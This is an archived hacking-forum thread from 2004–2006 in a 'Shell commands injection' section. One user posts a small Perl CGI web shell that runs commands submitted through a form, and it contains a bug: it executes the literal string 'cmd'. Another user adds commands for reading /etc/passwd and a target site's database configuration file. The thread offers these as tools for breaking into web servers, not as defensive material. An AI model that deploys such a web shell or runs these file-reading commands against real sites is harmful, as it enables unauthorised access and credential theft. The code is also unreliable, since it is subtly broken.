|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 157
Members: 0
Total: 157
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
backtick fun i guess... |
|
Posted: Tue Nov 30, 2004 10:04 am |
|
|
VTEC |
Beginner |
|
|
Joined: Nov 30, 2004 |
Posts: 2 |
|
|
|
|
|
|
|
here is for when you are bored to death.
Code: | #!/usr/bin/perl
use CGI qw(param);
$cmd = param("cmd");
$res = `cmd`;
$res =~ s/textarea/TEzTARoA/gi;
print "Content-Type: text/html\n\n";
print "<HTML><FORM><INPUT TYPE=text name=cmd></form>";
if ($cmd ne ""){
print "<HTML><FORM><textarea rows=35 cols35>$res</textarea></FORM>";
} |
good commands are
Code: |
cd = duh
ls=list files
ls -a list ALL files
copy x:x
cat filename.ext = will source ANY PAGE
|
have fun
-v5 |
|
|
|
|
Posted: Sun Jul 30, 2006 9:50 am |
|
|
Zipper_ |
Active user |
|
|
Joined: Aug 03, 2005 |
Posts: 29 |
|
|
|
|
|
|
|
Code: | cat /etc/passwd - webservers users list
cat ./../mainfile.php - lists targets db config |
couple more commands for you |
|
|
|
|
www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|